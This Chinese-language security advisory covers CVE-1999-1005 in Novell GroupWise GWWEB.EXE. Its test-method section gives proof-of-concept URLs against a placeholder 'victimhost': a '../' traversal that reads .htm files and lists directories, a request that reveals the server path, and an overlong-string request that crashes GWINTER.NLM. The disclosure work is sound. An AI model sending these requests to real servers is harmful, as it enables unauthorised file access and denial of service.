首页 -> 安全研究

安全研究

安全漏洞
Novell GroupWise GWWEB.EXE存在多个漏洞

发布日期:1999-12-19
更新日期:1999-12-19

受影响系统:
Netscape Enterprise Server for NetWare 4/5 3.0.7a
    - Novell NetWare 5.0
    - Novell NetWare 4.11SP5B
    - Novell NetWare 4.11
Novell Groupwise 5.2
    - Novell NetWare 5.0
    - Novell NetWare 4.11
Novell Groupwise 5.5
    - Novell NetWare 5.0
    - Novell NetWare 4.11
描述:
BUGTRAQ  ID: 879
CVE(CAN) ID: CVE-1999-1005

GWWEB.EXE的HELP功能存在泄漏服务器路径的漏洞,配合字符串'../',将可以列出所有可访问的目录以及浏览服务器上所有.htm文件。

给GWINTER.NLM的变量指定超长字符串可能会异常终止。

远程攻击者可以利用这些漏洞浏览服务器上的文件,甚至执行任意代码。

<*来源:Sacha Faust Bourque (sfaust@hartco.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=94571433731824&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Sacha Faust Bourque (sfaust@hartco.com)提供了如下测试方法:

提交如下请求:

http://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=asdf

将返回错误消息包含物理路径:

Could not read file SYS:WEB\CGI-BIN\GW5\US\HTML3\HELP\ASDF.HTM

读取服务器上.htm文件:

http://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm

遍历路径:

http://victimhost/cgi-bin/GW5/GWWEB.EXE?HELP=../../../

提交如下请求将导致GWINTER.NLM异常终止:

http ://victimhost/cgi-bin/GW5/GWWEB.EXE?[512+ chars]

建议:
厂商补丁:

Novell
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://support.novell.com/security-alerts

浏览次数:7725
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障